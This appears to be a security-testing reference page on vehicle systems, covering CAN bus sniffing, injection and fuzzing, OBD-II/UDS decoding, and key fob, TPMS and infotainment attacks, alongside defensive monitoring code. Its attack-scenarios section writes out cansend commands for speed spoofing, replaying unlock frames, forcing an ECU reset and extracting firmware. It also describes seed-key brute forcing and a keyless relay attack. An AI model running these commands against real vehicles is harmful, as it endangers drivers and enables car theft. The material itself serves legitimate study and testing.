# Automotive Security

Security testing for vehicle systems - CAN bus, LIN, OBD-II, and connected car security.

> **Skill Level**: Advanced\
> **Prerequisites**: Embedded systems, networking, automotive protocols

## Overview

```
Vehicle attack surfaces:
- CAN bus (internal communication)
- OBD-II port (diagnostic access)
- Infotainment systems (Android/Linux)
- Telematics (cellular, GPS)
- Bluetooth/WiFi
- Key fobs (RF)
- TPMS (tire pressure sensors)
```

## CAN Bus (Controller Area Network)

### Basics

```
- Broadcast protocol (all nodes see all messages)
- No authentication (by design)
- 11-bit or 29-bit identifiers
- Up to 8 bytes data per frame
- Speeds: 125 kbps to 1 Mbps
```

### Hardware

```
Required:
- CAN interface: CANtact, PCAN-USB, Kvaser
- OBD-II to DB9 cable
- Linux laptop with can-utils

Budget options:
- Arduino + MCP2515 CAN shield (~$15)
- ELM327 (limited, read-only OBD)
```

### Setup

```bash
# Load CAN kernel modules
sudo modprobe can
sudo modprobe can_raw
sudo modprobe can_bcm
sudo modprobe vcan  # Virtual CAN for testing

# Create virtual CAN interface (testing)
sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0

# Setup real interface (CANtact/similar)
sudo slcand -o -c -s6 /dev/ttyACM0 can0
sudo ip link set up can0

# Or with specific bitrate
sudo ip link set can0 type can bitrate 500000
sudo ip link set up can0
```

### Sniffing

```bash
# can-utils - candump
candump can0
candump -L can0  # Log file format on stdout
candump -c can0  # Color output

# Expected output:
# can0  7DF   [8]  02 01 00 00 00 00 00 00
# can0  7E8   [8]  06 41 00 BE 3F A8 11 00

# Filter specific IDs: the filter is <can_id>:<can_mask>, applied as
# (received_id & mask) == can_id, so 7DF:7FF matches only ID 7DF
candump can0,7DF:7FF

# Save to file
candump -l can0  # Creates candump-YYYY-MM-DD_HHMMSS.log
```

### Analysis

```bash
# cansniffer - Show changing bytes
cansniffer can0

# Highlight changes in real-time
# Press '-' to filter out static messages

# canplayer - Replay captured traffic
canplayer -I candump-log.log can0

# cangen - Generate test traffic: fixed ID 0x123, random payload, 100 ms gap
cangen -g 100 -I 123 can0
```
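The `cansniffer` view above is interactive; for offline work it is useful to run the same kind of analysis over a `candump -l` log and, at the same time, look for the two things a bus monitor would flag: IDs that never appeared in a known-good baseline, and messages arriving far faster than their normal cycle time (the signature of injected or replayed frames). The following is an added example written for this page, not part of can-utils; the log lines are constructed, and the baseline ID set and the 100 ms cycle time for ID 0x123 are assumptions standing in for values you would measure on the real vehicle.

```python
"""Offline analysis of a candump -l log: per-ID cycle time, changing bytes,
and simple anomaly flags (unknown IDs, unexpected message rate).
Added example; not part of can-utils. The sample log is constructed."""
import re
from collections import defaultdict
from statistics import mean

# candump -l writes: (seconds.micros) iface id#hexdata  (constructed sample:
# a 100 ms periodic message 0x123, one OBD request/response pair, then a
# burst of 0x123 frames arriving every 1 ms with a different payload)
SAMPLE_LOG = """\
(1700000000.000000) can0 123#1122334400000000
(1700000000.010000) can0 7DF#0201000000000000
(1700000000.012000) can0 7E8#064100BE3FA81100
(1700000000.100000) can0 123#1122334500000000
(1700000000.200000) can0 123#1122334600000000
(1700000000.300000) can0 123#1122334700000000
(1700000000.301000) can0 123#FFFFFFFF00000000
(1700000000.302000) can0 123#FFFFFFFF00000000
(1700000000.303000) can0 123#FFFFFFFF00000000
"""

LINE_RE = re.compile(r"^\((\d+\.\d+)\)\s+(\S+)\s+([0-9A-Fa-f]{3,8})#([0-9A-Fa-f]*)$")

def parse_log(text):
    """Yield (timestamp, iface, can_id, payload bytes) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines rather than abort
        ts, iface, cid, data = m.groups()
        yield float(ts), iface, int(cid, 16), bytes.fromhex(data)

def summarize(frames):
    """Per CAN ID: message count, mean cycle time in ms, and the byte positions
    that ever differed from the first frame (what cansniffer highlights)."""
    by_id = defaultdict(list)
    for ts, _iface, cid, data in frames:
        by_id[cid].append((ts, data))
    summary = {}
    for cid, items in by_id.items():
        times = [t for t, _ in items]
        gaps = [b - a for a, b in zip(times, times[1:])]
        first = items[0][1]
        changing = sorted({i for _, d in items for i in range(len(d))
                           if i < len(first) and d[i] != first[i]})
        summary[cid] = {
            "count": len(items),
            "cycle_ms": round(mean(gaps) * 1000, 3) if gaps else None,
            "changing_bytes": changing,
        }
    return summary

def flag_anomalies(frames, baseline_ids, expected_cycle_ms, tolerance=0.5):
    """Flag IDs absent from a known-good baseline, and frames arriving in less
    than `tolerance` * their nominal period. expected_cycle_ms maps
    CAN ID -> nominal period in ms (assumed values, measured on the vehicle)."""
    alerts = []
    last_seen = {}
    for ts, _iface, cid, _data in frames:
        if cid not in baseline_ids:
            alerts.append((ts, cid, "unknown ID"))
        if cid in expected_cycle_ms and cid in last_seen:
            gap_ms = (ts - last_seen[cid]) * 1000
            if gap_ms < expected_cycle_ms[cid] * tolerance:
                alerts.append((ts, cid, f"gap {gap_ms:.1f} ms < expected {expected_cycle_ms[cid]} ms"))
        last_seen[cid] = ts
    return alerts

if __name__ == "__main__":
    frames = list(parse_log(SAMPLE_LOG))
    for cid, info in sorted(summarize(frames).items()):
        print(f"{cid:03X} count={info['count']} cycle={info['cycle_ms']} ms "
              f"changing_bytes={info['changing_bytes']}")
    for ts, cid, reason in flag_anomalies(frames, {0x123, 0x7DF}, {0x123: 100}):
        print(f"ALERT {ts:.3f} {cid:03X}: {reason}")
```

Run it against a real `candump -l` file by replacing `SAMPLE_LOG` with the file contents; the baseline ID set should come from a capture taken while the vehicle is in a known state, and a cycle-time table built from `summarize()` on that capture is the natural input to `flag_anomalies()`.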

### Injection

```bash
# Send single frame
cansend can0 7DF#0201000000000000

# Send frame with specific data
cansend can0 123#DEADBEEF

# Replay attack
canplayer -I capture.log can0

# Continuous injection
while true; do cansend can0 123#0102030405060708; sleep 0.01; done
```

### Fuzzing

```bash
# can-utils cangen (random)
cangen can0 -g 10 -I i  # Random IDs, 10ms gap

# caringcaribou (automotive fuzzer)
# https://github.com/CaringCaribou/caringcaribou
caringcaribou -i can0 uds discovery
caringcaribou -i can0 uds services 0x7e0

# Custom fuzzer
for id in $(seq 0 2047); do
    cansend can0 $(printf '%03X' $id)#0102030405060708
    sleep 0.01
done
```

## OBD-II (On-Board Diagnostics)

### Basics

```
- Mandatory on all US vehicles since 1996
- Standardized connector location (driver's side)
- Protocols: CAN, ISO 9141-2, KWP2000, SAE J1850

Standard PIDs (Parameter IDs):
- 01 00: Supported PIDs
- 01 0C: Engine RPM
- 01 0D: Vehicle speed
- 01 2F: Fuel tank level
```
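The PIDs listed above come back inside an ISO-TP single frame on 7E8-7EF, as in the `06 41 00 BE 3F A8 11 00` response shown in the sniffing output: a length nibble, the mode byte plus 0x40, the PID, then the data bytes. Decoding them by hand is the fastest way to sanity-check what a tool reports. The following decoder is an added example written for this page, not code from any tool it mentions; the formulas are the standard SAE J1979 ones for the PIDs above, the 7E8 frame is the one from the candump output, and the RPM, speed, fuel and negative-response frames are constructed.

```python
"""Decode OBD-II mode 01 responses carried in an ISO-TP single frame.
Added example for this page. Supported-PID bitmask and the RPM, speed and
fuel formulas follow SAE J1979; the 7E8 sample is from the candump output
above, the other sample frames are constructed."""

# Decoders for the PIDs listed above: name, data bytes needed, formula.
PID_DECODERS = {
    0x0C: ("Engine RPM", 2, lambda d: (256 * d[0] + d[1]) / 4),
    0x0D: ("Vehicle speed (km/h)", 1, lambda d: d[0]),
    0x2F: ("Fuel tank level (%)", 1, lambda d: 100 * d[0] / 255),
}
BITMASK_PIDS = (0x00, 0x20, 0x40, 0x60, 0x80, 0xA0, 0xC0, 0xE0)

def supported_pids(bitmask, base=0x00):
    """PID 00/20/40... responses are 4-byte bitmasks; the MSB of the first
    byte stands for PID base+1, the LSB of the last byte for PID base+32."""
    value = int.from_bytes(bitmask[:4], "big")
    return [base + 1 + i for i in range(32) if value >> (31 - i) & 1]

def decode_obd_response(frame_hex):
    """frame_hex is the 8-byte payload of a 7E8-7EF frame, e.g. '064100BE3FA81100'.
    Returns a dict describing the response; raises ValueError on malformed input."""
    data = bytes.fromhex(frame_hex)
    if len(data) != 8:
        raise ValueError("expected an 8-byte classic CAN payload")
    pci = data[0]
    if pci >> 4 != 0:
        raise ValueError("not an ISO-TP single frame (multi-frame not handled here)")
    body = data[1:1 + (pci & 0x0F)]
    if len(body) < 2:
        raise ValueError("single frame too short for mode + PID")
    if body[0] == 0x7F:
        # Negative response: 7F <requested mode> <negative response code>
        if len(body) < 3:
            raise ValueError("negative response without NRC byte")
        return {"mode": 0x7F, "requested_mode": body[1],
                "error": f"negative response, NRC 0x{body[2]:02X}"}
    mode, pid, payload = body[0], body[1], body[2:]
    if mode != 0x41:
        raise ValueError(f"expected a mode 01 response (0x41), got 0x{mode:02X}")
    if pid in BITMASK_PIDS:
        return {"mode": 1, "pid": pid, "name": "Supported PIDs",
                "value": supported_pids(payload, base=pid)}
    if pid not in PID_DECODERS:
        return {"mode": 1, "pid": pid, "name": "unknown PID", "raw": payload.hex()}
    name, nbytes, formula = PID_DECODERS[pid]
    if len(payload) < nbytes:
        raise ValueError(f"PID {pid:02X} needs {nbytes} data bytes, got {len(payload)}")
    return {"mode": 1, "pid": pid, "name": name, "value": formula(payload)}

if __name__ == "__main__":
    for f in ("064100BE3FA81100",   # supported-PIDs response from the candump sample above
              "04410C1770000000",   # RPM: (0x17*256 + 0x70) / 4 = 1500 (constructed)
              "03410D3C00000000",   # speed: 0x3C = 60 km/h (constructed)
              "03412F8000000000",   # fuel: 100*128/255 = 50.2 % (constructed)
              "037F011200000000"):  # NRC 0x12 subFunctionNotSupported (constructed)
        print(f, "->", decode_obd_response(f))
```

The supported-PIDs result for the candump sample tells you which of the PIDs above the ECU will actually answer (0x0C and 0x0D are in the mask, 0x2F would be reported by the PID 0x20 mask), which is the first thing to check when a `python-OBD` query returns nothing.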

### Tools

```bash
# ELM327 adapter (budget, read-only)
# Connect via Bluetooth/USB/WiFi

# python-OBD
pip install obd

python3 << 'EOF'
import obd
connection = obd.OBD()  # Auto-connect
print(connection.query(obd.commands.RPM))
print(connection.query(obd.commands.SPEED))
EOF

# Output:
# 1500 RPM
# 60 kph
```

### UDS (Unified Diagnostic Services)

```bash
# UDS is ISO 14229 - standard diagnostic protocol

# Common services:
# 0x10: Diagnostic Session Control
# 0x11: ECU Reset
# 0x22: Read Data By Identifier
# 0x27: Security Access
# 0x2E: Write Data By Identifier
# 0x31: Routine Control
# 0x34/35/36/37: Upload/Download

# Using caringcaribou
caringcaribou -i can0 uds discovery
caringcaribou -i can0 uds services 0x7e0
caringcaribou -i can0 uds subservices 0x7e0 0x27  # Security access

# Brute force security access (seed-key)
caringcaribou -i can0 uds security_seed 0x7e0 1
```
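Reading UDS traffic on the bus means recognising three frame shapes: a request (service ID followed by an optional sub-function, where bit 7 of the sub-function byte suppresses the positive response), a positive response (service ID plus 0x40) and a negative response (0x7F, requested service, negative response code). A bus monitor that decodes these can raise an alert on the state-changing services listed above, on non-default sessions, and on failed SecurityAccess attempts. The following decoder is an added example written for this page, not part of caringcaribou or can-utils; the 7E0 frames are the ones used elsewhere on this page in `cansend` notation, the 7E8 responses are constructed, and the set of services treated as alert-worthy is an assumption you would tune per vehicle.

```python
"""Decode UDS (ISO 14229) single-frame requests and responses carried over
ISO-TP on CAN, and flag the frames a bus monitor should alert on.
Added example for this page; frames use the cansend 'ID#DATA' notation.
The 7E8 responses are constructed."""

# Services listed above; a positive response uses SID + 0x40
SERVICES = {
    0x10: "DiagnosticSessionControl", 0x11: "ECUReset", 0x22: "ReadDataByIdentifier",
    0x27: "SecurityAccess", 0x2E: "WriteDataByIdentifier", 0x31: "RoutineControl",
    0x34: "RequestDownload", 0x35: "RequestUpload", 0x36: "TransferData",
    0x37: "RequestTransferExit",
}
SUBFUNCTIONS = {
    0x10: {0x01: "defaultSession", 0x02: "programmingSession", 0x03: "extendedDiagnosticSession"},
    0x11: {0x01: "hardReset", 0x02: "keyOffOnReset", 0x03: "softReset"},
    0x27: {0x01: "requestSeed", 0x02: "sendKey"},
}
NRC = {
    0x10: "generalReject", 0x11: "serviceNotSupported", 0x12: "subFunctionNotSupported",
    0x13: "incorrectMessageLengthOrInvalidFormat", 0x22: "conditionsNotCorrect",
    0x31: "requestOutOfRange", 0x33: "securityAccessDenied", 0x35: "invalidKey",
    0x36: "exceededNumberOfAttempts", 0x37: "requiredTimeDelayNotExpired",
    0x78: "requestCorrectlyReceivedResponsePending",
}
# Assumed monitoring policy: services that change ECU state or touch firmware
SENSITIVE = {0x11, 0x27, 0x2E, 0x31, 0x34, 0x35, 0x36, 0x37}
# NRCs that indicate a failed or rate-limited SecurityAccess attempt
SECURITY_FAILURE_NRCS = {0x33, 0x35, 0x36, 0x37}

def parse_cansend(frame):
    """'7E0#0210010000000000' -> (0x7E0, b'\\x02\\x10\\x01\\x00...')"""
    cid, sep, data = frame.partition("#")
    if not sep or not data:
        raise ValueError(f"bad frame {frame!r}: expected ID#DATA")
    return int(cid, 16), bytes.fromhex(data)

def decode_uds(frame):
    """Return a dict with kind (request/positive/negative), service, sub-function
    or NRC, and an 'alert' flag under the monitoring policy above."""
    cid, data = parse_cansend(frame)
    if data[0] >> 4 != 0:
        raise ValueError("only ISO-TP single frames are handled here")
    body = data[1:1 + (data[0] & 0x0F)]
    if not body:
        raise ValueError("empty single frame")
    sid = body[0]
    info = {"can_id": cid, "sid": sid, "alert": False}
    if sid == 0x7F and len(body) >= 3:
        info.update(kind="negative", service=SERVICES.get(body[1], f"0x{body[1]:02X}"),
                    nrc=NRC.get(body[2], f"0x{body[2]:02X}"))
        info["alert"] = body[2] in SECURITY_FAILURE_NRCS
        return info
    if sid >= 0x40 and (sid - 0x40) in SERVICES:
        info.update(kind="positive", service=SERVICES[sid - 0x40])
        return info
    info.update(kind="request", service=SERVICES.get(sid, f"unknown 0x{sid:02X}"))
    if sid in SUBFUNCTIONS and len(body) >= 2:
        sub = body[1] & 0x7F  # bit 7 = suppressPosRspMsgIndication
        info["subfunction"] = SUBFUNCTIONS[sid].get(sub, f"0x{sub:02X}")
        info["suppress_response"] = bool(body[1] & 0x80)
    non_default_session = sid == 0x10 and info.get("subfunction") != "defaultSession"
    info["alert"] = sid in SENSITIVE or non_default_session
    return info

SAMPLE_FRAMES = [
    "7E0#0210010000000000",  # from this page: enter default session
    "7E8#065001003201F400",  # constructed positive response (50 01 + P2/P2* timings)
    "7E0#0210030000000000",  # from this page: extended diagnostic session
    "7E0#0227010000000000",  # from this page: SecurityAccess requestSeed, level 1
    "7E8#037F273300000000",  # constructed negative response: securityAccessDenied
    "7E0#0211010000000000",  # from this page: ECUReset hardReset
]

def monitor(frames):
    """Decode a sequence of frames; callers inspect the 'alert' flag of each."""
    return [decode_uds(f) for f in frames]

if __name__ == "__main__":
    for d in monitor(SAMPLE_FRAMES):
        print(("ALERT " if d["alert"] else "      ") + str(d))
```

Feeding the decoder with the output of the log parser from the CAN analysis section (the `ID#DATA` part of each line) gives a minimal diagnostic-traffic monitor; in a production setting the 7E0-7EF range would be watched for any request outside a legitimate workshop session.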

## Attack Scenarios

### Speed Spoofing

```bash
# Find speed CAN ID (usually instrument cluster)
# Use cansniffer while driving at constant speed

# Inject false speed
cansend can0 ABC#00FF00000000  # Specific to vehicle

# Can affect:
# - Speedometer display
# - ADAS systems
# - Transmission behavior
```

### Door Unlock

```bash
# Monitor CAN bus while using key fob
candump can0 > baseline.log
# Press unlock on key fob
candump can0 > unlock.log

# Compare to find unlock message
diff baseline.log unlock.log

# Replay unlock command
cansend can0 [ID]#[DATA]
```

### Engine Shutdown

```bash
# Find ECU diagnostic IDs (usually 7E0-7EF range)
# Send diagnostic session + ECU reset

# Enter diagnostic session
cansend can0 7E0#0210010000000000

# Send ECU reset (sub-function 0x01 = hardReset)
cansend can0 7E0#0211010000000000
```

### Firmware Extraction

```bash
# UDS firmware download
# Requires bypassing security access first

# 1. Enter extended diagnostic session
cansend can0 7E0#0210030000000000

# 2. Security access (need seed-key algorithm)
cansend can0 7E0#0227010000000000  # Request seed
# Calculate key from seed
cansend can0 7E0#022702[KEY]  # Send key

# 3. Request upload
cansend can0 7E0#103400[address][size]

# 4. Transfer data
cansend can0 7E0#3601...  # Read chunks
```

## Key Fob Attacks

### Relay Attack

```
Equipment:
- 2x SDR devices (HackRF, RTL-SDR)
- Amplifiers
- Yagi antennas

Attack:
1. Device A near car, Device B near owner
2. Relay RF signals between devices
3. Car thinks key is nearby
4. Unlock/start vehicle
```

### Rolling Code Analysis

```bash
# Capture with RTL-SDR + GNU Radio
# Most modern vehicles use rolling codes (KeeLoq, etc.)

# Universal Radio Hacker (URH)
# https://github.com/jopohl/urh
urh  # GUI for signal analysis

# Analyze captured signals
# Look for patterns, synchronization
```

### TPMS (Tire Pressure)

```bash
# Usually 315 MHz (US) or 433 MHz (EU)
# Often unencrypted

# Capture with RTL-SDR
rtl_433 -f 315M

# Can potentially:
# - Track vehicles by TPMS ID
# - Spoof low pressure warnings
# - Cause driver distraction
```

## Infotainment Systems

### Attack Surface

```
- USB ports (often run as root)
- Bluetooth (pairing, profile attacks)
- WiFi (if equipped)
- Cellular (telematics)
- Navigation data (SD cards)
- App stores (Tesla, Android Auto)
```

### Testing

```bash
# USB: Check for update mechanisms
# Many accept USB drives for firmware updates

# Bluetooth: Standard BLE/BR/EDR attacks
# See wireless.md and iot-protocols.md

# Root access: Many run Linux/Android
adb connect [IP]  # If ADB exposed
```

## Tools

```bash
# can-utils
sudo apt install can-utils

# Caring Caribou
# https://github.com/CaringCaribou/caringcaribou
pip install caringcaribou

# ICSim (Instrument Cluster Simulator)
# https://github.com/zombieCraig/ICSim
# Practice without a real vehicle

# Kayak
# https://github.com/dschanoeh/Kayak
# Java-based CAN analysis

# SavvyCAN
# https://github.com/collin80/SavvyCAN
# GUI for CAN analysis

# Vehicle Spy (commercial)
# CANalyzer (commercial)
```

## Legal Considerations

```
⚠️ IMPORTANT:
- Only test on vehicles you own or have written permission
- Never test on public roads while driving
- Some attacks may void warranties
- May violate CFAA (US) or similar laws
- Automotive OEMs may pursue legal action
```

## Related Topics

* [Hardware Hacking](/others/hardware.md) - Physical security testing
* [Wireless Testing](/others/wireless.md) - RF attacks
* [IoT Protocols](/others/iot-protocols.md) - Related protocols

